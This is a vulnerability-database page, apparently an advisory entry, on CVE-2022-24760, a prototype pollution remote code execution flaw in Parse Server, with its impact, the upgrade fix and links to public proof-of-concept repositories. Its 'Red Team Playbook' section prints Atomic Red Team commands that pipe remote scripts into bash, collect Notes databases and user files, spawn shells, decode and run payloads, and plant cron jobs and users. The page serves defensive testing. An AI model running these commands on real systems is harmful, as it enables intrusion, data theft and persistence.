CVE-2022-24760
Overview
This vulnerability is a prototype pollution flaw within the DatabaseController.js component of Parse Server, an open-source HTTP backend. The root cause lies in improper handling of object properties that allows an attacker to manipulate the prototype of base objects. This flaw affects the server's database abstraction layer, impacting MongoDB and potentially other supported backends like Postgres due to shared vulnerable code paths.
Vulnerability Description
Parse Server is an open source http web server backend. In versions prior to 4.10.7 there is a Remote Code Execution (RCE) vulnerability in Parse Server. This vulnerability affects Parse Server in the default configuration with MongoDB. The main weakness that leads to RCE is the Prototype Pollution vulnerable code in the file `DatabaseController.js`, so it is likely to affect Postgres and any other database backend as well. This vulnerability has been confirmed on Linux (Ubuntu) and Windows. Users are advised to upgrade as soon as possible. The only known workaround is to manually patch your installation with code referenced at the source GHSA-p6h4-93qp-jhcm.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code on the Parse Server host, leveraging prototype pollution to escalate privileges and execute commands with server-level access. Since the attack vector requires no user interaction and no privileges (AV:N/AC:L/PR:N/UI:N), it enables full compromise of the backend system. This can lead to complete data breach, service disruption, and lateral movement within affected environments.
Solution
Users must upgrade Parse Server to version 4.10.7 or later as detailed in the GitHub security advisory GHSA-p6h4-93qp-jhcm. If immediate upgrading is not feasible, the advisory provides a manual patch to address the prototype pollution flaw in DatabaseController.js. Refer to the official commit 886bfd7cac69496e3f73d4bb536f0eec3cba0e4d and the advisory page for step-by-step remediation instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Parse Server, specifically related to Remote Code Execution (RCE), stems from a flaw in the Prototype Pollution mechanism within the `DatabaseController.js` file. This weakness allows an attacker to manipulate the prototype of an object, which can lead to arbitrary code execution on the server. In its default configuration with MongoDB, the Parse Server is particularly susceptible, but the issue is not limited to this database; it also extends to other backends such as Postgres. The flaw arises from inadequate input validation, which permits attackers to inject malicious payloads that can alter the behavior of the application, potentially leading to unauthorized access and control over the server environment.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a specially designed request to the Parse Server, targeting the vulnerable endpoint that processes user input. By sending this request, the attacker could manipulate the server's behavior, executing arbitrary code that could compromise the integrity and confidentiality of the system. Scenarios may include executing shell commands, accessing sensitive data, or deploying further malicious payloads within the server environment. Given the widespread use of Parse Server in web applications, the potential for exploitation is significant, especially if the server is exposed to the internet without adequate security measures.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Parse Server for their backend infrastructure. A successful exploitation could lead to severe business risks, including data breaches, loss of customer trust, and financial repercussions from downtime or remediation efforts. Organizations may face regulatory scrutiny if sensitive data is compromised, leading to potential legal liabilities. Furthermore, the ease of exploitation means that even organizations with limited cybersecurity resources could find themselves at risk, making this vulnerability a critical concern for businesses of all sizes.
To detect and mitigate this vulnerability, organizations should prioritize upgrading their Parse Server installations to the latest version, which addresses the flaw. Regular patch management practices are essential to ensure that all software components are up to date. Additionally, implementing robust input validation and sanitization measures can help prevent prototype pollution attacks. Network security measures, such as firewalls and intrusion detection systems, can also be employed to monitor and block suspicious activity targeting the Parse Server. Organizations should conduct regular security assessments and penetration testing to identify potential vulnerabilities in their systems, ensuring a proactive approach to cybersecurity.
In conclusion, the Remote Code Execution vulnerability in Parse Server poses a significant threat to organizations utilizing this backend framework. The potential for exploitation through prototype pollution highlights the need for diligent security practices, including timely updates and comprehensive input validation. By understanding the nature of this vulnerability and implementing effective detection and mitigation strategies, organizations can safeguard their systems against the risks associated with this critical flaw. The importance of maintaining a robust security posture cannot be overstated, as the consequences of inaction can lead to devastating impacts on both the organization and its stakeholders.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Parseplatform | Parse-Server | All |
cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
tuo4n8/CVE-2022-24760
|
tuo4n8 | 1 | 0 | 2022-03-31 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}"
$fileExtensions = $fileExtensionsString -split ", "
New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null
Function Search-Files {
param (
[string]$directory
)
$files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
$fileExtensions -contains $_.Extension.ToLower()
}
return $files
}
$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
$foundFilePaths = $foundFiles.FullName
Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"
Write-Host "Zip file created: $outputZip\data.zip"
} else {
Write-Host "No files found with the specified extensions."
}
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-24760 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/parse-community/parse-server/security/advisories/GHSA-p6h4-93qp-jhcm |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/parse-community/parse-server/commit/886bfd7cac69496e3f73d4bb536f0eec3cba0e4d |
| huntr.dev |
GitHub CVE
x_refsource_MISC
|
https://www.huntr.dev/bounties/ac24b343-e7da-4bc7-ab38-4f4f5cc9d099/ |